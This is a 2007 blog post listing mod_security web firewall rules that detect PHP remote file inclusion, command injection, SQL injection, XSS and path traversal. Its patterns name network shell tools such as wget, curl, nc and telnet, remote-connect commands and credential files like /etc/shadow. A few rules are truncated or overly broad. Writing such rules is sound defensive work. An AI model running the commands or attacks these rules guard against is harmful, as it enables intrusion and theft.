Archive for May, 2007

Modsecurity Rules

Wednesday, May 30th, 2007

There are many articles in Google on how to set up mod_security, so I'm not covering that here. From my experience, though, many admins have trouble adding rules to mod_security. After a lot of searching in Google, plus my own research, I've put together a list of mod_security rules; some of them are below. Sorry if I forgot to credit a site. These rules really help, though they might cause problems with some sites/scripts; most of them just work fine:

#really broad url_fopen attack sig
#tune this for your system
#MTS
SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/gallery/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:1,severity:2,msg:'Generic PHP code injection protection'"
SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"

#Generic PHP body attack
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)" chain
SecFilterSelective POST_PAYLOAD "^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#Generic PHP remote file injection
SecFilterSelective REQUEST_URI "!((galler(y|i)/do_command))" chain
SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp)\:/.*(cmd|command)="

#remote file inclusion generic attack signature
SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="

#PHP remote path attack generic signature
SecFilterSelective REQUEST_URI "\.ph(p(3|4)?).*path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "\.php.*path=(http|https|ftp)\:/"

#PHP Injection Attack generic signature
SecFilterSelective REQUEST_URI "\.php" chain
SecFilter "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))"

#PHP Injection Attack generic signature
SecFilterSelective REQUEST_URI "\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|cat|include_location|gorumDir|root|page|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))"

#Generic PHP remote file inclusion attack signature
SecFilterSelective REQUEST_URI "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#Generic PHP remote file inclusion attack signature
SecFilterSelective REQUEST_URI "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=.*(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#PHP defenses
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"

#PHP defenses
SecFilterSelective ARGS_NAMES "^(globals($|\[)|php:/)"

#PHP defenses
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

#generic sig for more bad PHP functions
SecFilterSelective THE_REQUEST "chr\(([0-9]{1,3})\)"
SecFilterSelective ARGS_NAMES "^php:/"

SecFilterSelective THE_REQUEST "cd \.\."
SecFilterSelective THE_REQUEST "/\.(history|bash_history) HTTP\/(0\.9|1\.0|1\.1)$"

#generic block for fwrite fopen uploads
SecFilterSelective THE_REQUEST "fwrite" chain
SecFilterSelective THE_REQUEST "fopen"

# WEB-MISC Tomcat view source attempt
SecFilterSelective THE_REQUEST "\x252ejsp"

# TIKIWIKI
SecFilterSelective REQUEST_URI "/tiki-map.phtml\?mapfile=\.\./\.\./"

#SMTP redirects
SecFilterSelective THE_REQUEST "^(http|https)\:/.+:25"

#These are VERY experimental, please report false positives/negatives, etc.
#very experimental generic remote download sig
#foo IP or FQDN, or foo http/https/ftp://whatever
SecFilterSelective THE_REQUEST "(perl|t?ftp|links|elinks|lynx|ncftp|(s|r)(cp|sh)|wget|lwp-(download|request|mirror|rget)|curl|cvs|svn).*\x20((http|https|ftp)\:/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|0-9]\.[a-zA-Z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"

#Command inline detection
SecFilterSelective THE_REQUEST "( |\;|/|\'|,|\&|\=|\.)((s|r)(sh|cp)) *(.*\@.*|(http|https|ftp)\:/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|0-9]\.[a-zA-Z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"

#very experimental connect command sig
SecFilterSelective THE_REQUEST "( |\;|/|\'|,|\&|\=|\.)(perl|nc|telnet|(rs)sh|rexec) .*([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[A-Za-z|0-9]\.[a-zA-Z]{2,4}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"

# Web-attacks chdir
SecFilterSelective REQUEST_URI "&(cmd|command)=chdir\x20"

#Don't accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
SecFilterSelective HTTP_Transfer-Encoding "chunked" "id:300003,rev:1,severity:2,msg:'Chunked Transfer Encoding denied'"

#Code injection via content length
SecFilterSelective HTTP_Content-Length "\;(system|passthru|exec)\(" "id:330003,rev:1,severity:2,msg:'Code Injection in Content-Length header'"

#broad cross site scripting rule
#False alarms are a problem with this, use with caution
#SecFilterSelective THE_REQUEST "<(.|\n)+>"

#generic recursion signatures
SecFilterSelective REQUEST_URI "!(alt_mod_frameset\.php)" "chain,id:300004,rev:1,severity:2,msg:'Generic Path Recursion denied'"
SecFilterSelective THE_REQUEST "\.\./\.\./"

#generic recursion signatures
SecFilterSelective THE_REQUEST "\.\|\./\.\|\./\.\|" "id:300005,rev:1,severity:2,msg:'Generic Path Recursion denied'"

#generic bogus path sigs
SecFilterSelective THE_REQUEST "\.\.\./" "id:300006,rev:1,severity:2,msg:'Bogus Path denied'"
SecFilterSelective POST_PAYLOAD "[[:space:]]+\.\.\.+\;" "id:300007,rev:1,severity:2,msg:'Bogus Path denied'"

#Generic PHP exploit signatures
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|e?chr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" "id:330001,rev:1,severity:2,msg:'Generic PHP exploit pattern denied'"

#Generic PHP exploit signatures
SecFilterSelective POST_PAYLOAD|REQUEST_URI "<\?php (chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" "id:330002,rev:1,severity:2,msg:'Generic PHP exploit pattern denied'"

#slightly tighter rules with narrower focus
SecFilterSelective REQUEST_URI|POST_PAYLOAD "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" "id:300008,rev:1,severity:2,msg:'Generic PHP exploit pattern denied'"

#generic XSS PHP attack types
SecFilterSelective REQUEST_URI "\.php\?" "chain,id:300010,rev:1,severity:2,msg:'Generic PHP XSS exploit pattern denied'"
SecFilter "(javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body\.innerHTML=window\.opener\.document\.body\.innerHTML\.replace)|onmouseover=\'javascript)"

#Prevent SQL injection in cookies
SecFilterSelective COOKIE_VALUES "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)" "id:300011,rev:1,severity:2,msg:'Generic SQL injection in cookie'"

#Prevent command injection through cookies
SecFilterSelective COOKIE_VALUES "\; cmd="

#Prevent SQL injection in UA
SecFilterSelective HTTP_USER_AGENT "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)" "id:300012,rev:1,severity:2,msg:'Generic SQL injection in User Agent header'"

# Generic filter to prevent SQL injection attacks
# Understand that all SQL filters are very limited and it is very difficult
# to prevent false positives and negatives.
# Please report false positives/negatives to mike@gotroot.com
SecFilterSelective REQUEST_URI "!((/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/horde3?/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(Downloads|Submit_News)|/admin\.php\?module=NS\-AddStory\&op=|/index\.php\?name=PNphpBB2&file=posting&mode=reply.*|/phpMyAdmin/|/PNphpBB2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/_mmServerScripts/|/node/[0-9]+/edit|/_vti_bin/.*\.exe/)" "chain,id:300013,rev:1,severity:2,msg:'Generic SQL injection protection'"
SecFilter "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)"
#Generic SQL sigs
SecFilterSelective ARGS "(or.+1[[:space:]]*=[[:space:]]1|(or 1=1|'.+)--')" "id:300014,rev:1,severity:2,msg:'Generic SQL injection protection'"

#Generic SQL sigs
SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"

#Generic SQL sigs
SecFilterSelective REQUEST_URI "!(/node/[0-9]+/edit|/forum/posting\.php|/admins/wnedit\.php|/alt_doc\.php\?returnUrl=.*edit|/admin/categories\.php\?cPath=.*|modules\.php\?name=Forums&file=posting&mode=.*)" "chain,id:300016,rev:1,severity:2,msg:'Generic SQL injection protection'"
SecFilterSelective ARGS "(insert[[:space:]]+into.+values|select.+from|bulk[[:space:]]+insert|union.+select)"

#Generic command line attack filter
SecFilterSelective REQUEST_URI "!(/Count\.cgi)" "chain,id:300017,rev:1,severity:2,msg:'Generic command line attack filter'"
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|"

#Generic PHP bad functions protection
#PHP copy() function: http://securitytracker.com/alerts/2006/Apr/1015882.html
SecFilterSelective ARGS_VALUES "compress\.zlib:"

#Generic XSS filter
#please report false positives
SecFilterSelective REQUEST_URI "!/mt\.cgi" chain
SecFilter "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"

#XSS in referrer and UA headers
SecFilterSelective HTTP_REFERER|HTTP_USER_AGENT "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"

#script, perl, etc. code in HTTP_Referer string
SecFilterSelective HTTP_Referer "\#\!.*/"

#generic command line attack
SecFilterSelective REQUEST_URI|ARGS "\|*id\;echo*\|"

#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"

#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)="

#remote file inclusion generic attack signature
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
SecFilter "\?\&(cmd|inc|name)="

#remote file inclusion generic attack signature
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)="

#Bogus file extensions generic signature
SecFilterSelective THE_REQUEST "[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt"

#generic attack sig
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname" chain
SecFilter "\x20-a"

#Enforce proper HTTP requests
SecFilterSelective SERVER_PROTOCOL "!^HTTP/(0\.9|1\.0|1\.1)$" "id:340000,rev:1,severity:1,msg:'Bad HTTP Protocol'"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$" "id:340004,rev:1,severity:2,msg:'Dis-allowed Transfer Encoding'"

#HTTP response splitting generic sigs
SecFilter "Content-Length\:.*Content-Type\:.*Content-Type\:" "id:340005,rev:1,severity:2,msg:'HTTP response splitting'"

#HTTP response splitting generic sigs
SecFilter "Content-Length\:" "chain,id:340006,rev:1,severity:2,msg:'HTTP response splitting'"
SecFilter "Content-Type\:" chain
SecFilter "Content-Type\:"

#deny TRACE method
SecFilterSelective REQUEST_METHOD "TRACE" "id:340007,rev:1,severity:2,msg:'TRACE method denied'"

#XSS insertion into Content-Type
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)" "id:300002,rev:1,severity:2,msg:'XSS attack in Content-type header'"

#Generic argument protection rule against bad meta characters
#SecFilterSelective "ARGS" "!^[A-Za-z0-9.&/?@_%=:;, -]*$"

#generic php attack sigs
SecFilterSelective REQUEST_URI "(&(cmd|command)=(id|uname)\x20|cmd\?(cmd|command)=|(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)=|\.php\?&(cmd|command)=)"

# WEB-ATTACKS xterm command attempt
SecFilterSelective THE_REQUEST "/usr/X11R6/bin/xterm"

# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST "/etc/shadow"

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"

# WEB-ATTACKS /usr/bin/id command attempt
SecFilterSelective THE_REQUEST "/usr/bin/id" chain
SecFilter "\x20"

# WEB-ATTACKS echo command attempt
SecFilterSelective THE_REQUEST "/bin/echo" chain
SecFilter "\x20"

# WEB-ATTACKS kill command attempt
SecFilterSelective THE_REQUEST "/bin/kill" chain
SecFilter "\x20"

# WEB-ATTACKS chmod command attempt
SecFilterSelective THE_REQUEST "/bin/chmod" chain
SecFilter "\x20"

# WEB-ATTACKS chsh command attempt
SecFilterSelective THE_REQUEST "/usr/bin/chsh"

# WEB-ATTACKS gcc command attempt
SecFilterSelective THE_REQUEST "gcc" chain
SecFilter "\x20-o"

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilterSelective THE_REQUEST "/usr/bin/cc" chain
SecFilter "\x20"

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilterSelective THE_REQUEST "/usr/bin/cpp" chain
SecFilter "\x20"

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilterSelective THE_REQUEST "/usr/bin/g\+\+" chain
SecFilter "\x20"

# WEB-ATTACKS g++ command attempt
SecFilterSelective THE_REQUEST "g\+\+\x20" chain
SecFilter "\x20"

# WEB-ATTACKS bin/python access attempt
SecFilterSelective THE_REQUEST "bin/python" chain
SecFilter "\x20"

# WEB-ATTACKS python access attempt
#SecFilter "python\x20"

# WEB-ATTACKS bin/tclsh execution attempt
SecFilterSelective THE_REQUEST "bin/tclsh"

# WEB-ATTACKS tclsh execution attempt
SecFilterSelective THE_REQUEST "tclsh8\x20"

# WEB-ATTACKS bin/nasm command attempt
SecFilterSelective THE_REQUEST "bin/nasm"

# WEB-ATTACKS nasm command attempt
SecFilterSelective THE_REQUEST "nasm\x20"

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilterSelective THE_REQUEST "/usr/bin/perl"

# WEB-ATTACKS traceroute command attempt
SecFilterSelective THE_REQUEST "traceroute" chain
SecFilter "\x20([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"

# WEB-ATTACKS ping command attempt
SecFilterSelective THE_REQUEST "/bin/ping" chain
SecFilter "\x20"

# WEB-ATTACKS X application to remote host attempt
SecFilterSelective THE_REQUEST "\x20-display\x20"

# WEB-ATTACKS mail command attempt
SecFilterSelective THE_REQUEST "/bin/mail" chain
SecFilter "\x20"

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls" chain
SecFilter "\x20"

# WEB-ATTACKS /etc/inetd.conf access
SecFilterSelective THE_REQUEST "/etc/inetd\.conf"

# WEB-ATTACKS /etc/motd access
SecFilterSelective THE_REQUEST "/etc/motd"

# WEB-ATTACKS conf/httpd.conf attempt
SecFilterSelective THE_REQUEST "conf/httpd\.conf"

# WEB-MISC .htpasswd access
SecFilterSelective THE_REQUEST "\.htpasswd"

# WEB-MISC /etc/passwd access
SecFilterSelective REQUEST_URI "/etc/passwd"

# WEB-MISC nessus 1.X 404 probe
SecFilterSelective REQUEST_URI "/nessus_is_probing_you_"

# WEB-MISC nessus 2.x 404 probe
SecFilterSelective REQUEST_URI "/NessusTest"

# WEB-MISC ls%20-l
SecFilterSelective THE_REQUEST "ls" chain
SecFilter "\x20-l"

# WEB-MISC apache directory disclosure attempt
SecFilterSelective THE_REQUEST "////////"

#musicat empower attempt
SecFilterSelective REQUEST_URI "/empower\?DB="

# WEB-MISC Apache Chunked-Encoding worm attempt
SecFilter "CCCCCCC\: AAAAAAAAAAAAAAAAAAA"

# WEB-MISC *%0a.pl access
SecFilterSelective REQUEST_URI "/*\x0a\.pl"

#PHPBB worm sigs
SecFilterSelective REQUEST_URI "!(tiki-searchindex\.php)" chain
SecFilterSelective ARG_highlight "(\x27|%27|\x2527|%2527)"

# WEB-FRONTPAGE .... request
SecFilterSelective THE_REQUEST "\.\.\.\./"

#experimental CSS rule
#SecFilterSelective REQUEST_URI "/(\x3C|<)(\x2F|\/)*[a-z0-9\%]+(\x3E|>)"

#Generic attack rules pcre format
#cross site scripting attempt IMG onerror or onload
SecFilterSelective THE_REQUEST "\

#cross site scripting attempt STYLE + JAVASCRIPT
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-javascript"

#cross site scripting attempt STYLE + JSCRIPT
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/jscript"

# cross site scripting attempt STYLE + VBSCRIPT
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/vbscript"

#cross site scripting attempt STYLE + VBSCRIPT
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-vbscript"

#cross site scripting attempt STYLE + ECMASCRIPT
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/ecmascript"

# cross site scripting attempt STYLE + EXPRESSION
SecFilterSelective THE_REQUEST "STYLE[\s]*=[\s]*[^>]expression[\s]*\("

#cross site scripting attempt STYLE + EXPRESSION
SecFilterSelective THE_REQUEST "[\s]*expression[\s]*\([^}]}[\s]*<\/STYLE>"

# cross site scripting attempt using XML
SecFilterSelective THE_REQUEST "SCRIPT"

#cross site scripting attempt executing hidden Javascript
SecFilterSelective THE_REQUEST "eval[\s]*\([\s]*[^\.]\.innerHTML[\s]*\)"

#cross site scripting attempt executing hidden Javascript
SecFilterSelective THE_REQUEST "window\.execScript[\s]*\("

#cross site scripting attempt to execute Javascript code
SecFilterSelective THE_REQUEST "/(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*javascript[\:]"

#cross site scripting stealth attempt to execute Javascript code
#may false alarm for some language sets
SecFilterSelective REQUEST_URI "!(/index\.php\?module=Blocks&type=admin&func=update|/index\.php\?go=.*&edit=)" chain
SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"

#cross site scripting HTML Image tag set to javascript attempt
SecFilterSelective THE_REQUEST "img xsrc=javascript"

#Apache /server-info accessible
SecFilterSelective REQUEST_URI "/server-info" chain
SecFilterSelective REMOTE_ADDR "!^127\.0\.0\.1$"

#Apache /server-status accessible
#Modified so apache-protect can run
SecFilterSelective REQUEST_URI "^/server-status/$" chain
SecFilterSelective REMOTE_ADDR "!^127\.0\.0\.1$"

#generic Common HTTP vulnerability
SecFilterSelective THE_REQUEST "/\?cwd=/"

#General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "\[url=(script|javascript|applet|about|chrome|activex)\:/.*\].*\[/url\]"

#Experimental XML-RPC generic attack sigs
SecFilter "\'\,\'\'\)\)\;"
SecFilter "\
\.*\'\)\;"

#XML-RPC generic attack sigs
SecFilterSelective POST_PAYLOAD "^Content-Type\: application/xml" chain
SecFilter "(\<.*xml)" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" chain
SecFilter "methodCall\>"

#Specific XML-RPC attacks on xmlrpc.php
SecFilterSelective THE_REQUEST "(/xmlrpc|.*xmlrpc_services)\.php" chain
SecFilter "(\<.*xml)" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#Too generic, unless you know you won't see this in any of the fields of an XMLRPC message on your system
#SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
#SecFilter "(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

#XML-RPC SQL injection generic signature
SecFilterSelective THE_REQUEST "(/xmlrpc|.*xmlrpc_services)\.php" chain
SecFilter ".*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>"

#generic remote file inclusion vulns
SecFilterSelective THE_REQUEST "/index\.php\?do=.*&page=(http|https|ftp)\:/"
SecFilterSelective THE_REQUEST "/index\.php\?kietu\[.*\]=(http|https|ftp)\:/"
SecFilterSelective THE_REQUEST "/index\.php\?libDir=http://xxxxxxxx"
SecFilterSelective THE_REQUEST "/init\.php\?HTTP_POST_VARS\[GALLERY_BASEDIR\]=(http|https|ftp)\:/"

#Virus HTTP Challenge/Response Auth
SecFilterSelective THE_REQUEST "^Authorization\: Negotiate" chain
SecFilter "YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFB"

#catch smuggling attacks
SecFilter "^(GET|POST).*Host:.*^(GET|POST)"

#Drupal remote command execution vulnerability exploit signature
#This is already covered in another generic signature, but just in case you leave it out, here it is
#again with a slightly tighter regexp
SecFilter "\<.*php .*\(.*\)\;system\(.*\).*php*\>"
#Slightly stronger version of the above
SecFilter "\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\).*php*\>"

#Generic PHP attack sig
SecFilterSelective THE_REQUEST "system\(getenv\(HTTP_PHP\)\)"

#Generic Nessus request filter
SecFilterSelective THE_REQUEST "NessusTest*\.html"

#Generic PHP payload command injection and upload vulnerabilities
SecFilterSelective POST_PAYLOAD "<\?php" chain
SecFilter "((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)" chain
SecFilter "\<\?php"

#Generic XML RPC attack sig
SecFilterSelective POST_PAYLOAD "\'(______BEGIN______|_____FIM_____)\'\;"

#HTTP header PHP code injection attacks
SecFilterSelective HTTP_CLIENT_IP|HTTP_USER_AGENT|HTTP_Referer "(<\?php|<[[:space:]]?\?[[:space:]]?php|<\? php)"
#wormsign
SecFilter "XXXXXXXXXXXXXXX\: \+\+\+\+\+\+\+\+\+\+\+\+\+"
SecFilterSelective THE_REQUEST "THMC\.\$dbhost\.THMC\.\$dbname\.THMC\.\$dbuser\.THMC\.\$dbpasswd\.THMC"

#phpbb wormsign
SecFilterSelective THE_REQUEST "echo _GHC/RST_"

#Generic PHP avatar upload exploits
SecFilterSelective REQUEST_URI "\.php" chain
SecFilterSelective POST_PAYLOAD "Content-Disposition\: form-data\; name=\"avatar\"\;" chain
SecFilter "\<\?php" chain
SecFilter "\?>"

#Fake image file shell attack
#(both conditions must hold, otherwise every image upload is blocked)
SecFilterSelective HTTP_Content-Type "image/.*" chain
SecFilterSelective POST_PAYLOAD "chr\("

#bogus graphics file
SecFilterSelective HTTP_Content-Disposition "\.php" chain
SecFilterSelective HTTP_Content-Type "(image/gif|image/jpg|image/png|image/bmp)"

#wormsign
SecFilterSelective REQUEST_URI "Hacked.*by.*member.*of.*SCC"

#Special account protection
SecFilterSelective THE_REQUEST "/~(root|ftp|bin|nobody|named|guest|logs|sshd)(/\S*)? HTTP/(0\.9|1\.[01])$"
SecFilterSelective REQUEST_URI "/~(root|ftp|bin|nobody|named|guest|logs|sshd)/"

#Generic PHP fopen sig
SecFilterSelective THE_REQUEST "fp=fopen\("

# above filters added by kapil from http://www.gotroot.com/downloads/ftp/mod_security/rules.conf

# WEB-ATTACKS passwd command attempt - added by kapil
SecFilterSelective THE_REQUEST "/etc/passwd"

# WEB-ATTACKS passwd command attempt - added by kapil
SecFilterSelective THE_REQUEST "passwd"

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget"

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"

# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img xsrc=javascript\) attempt
SecFilter "img xsrc=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

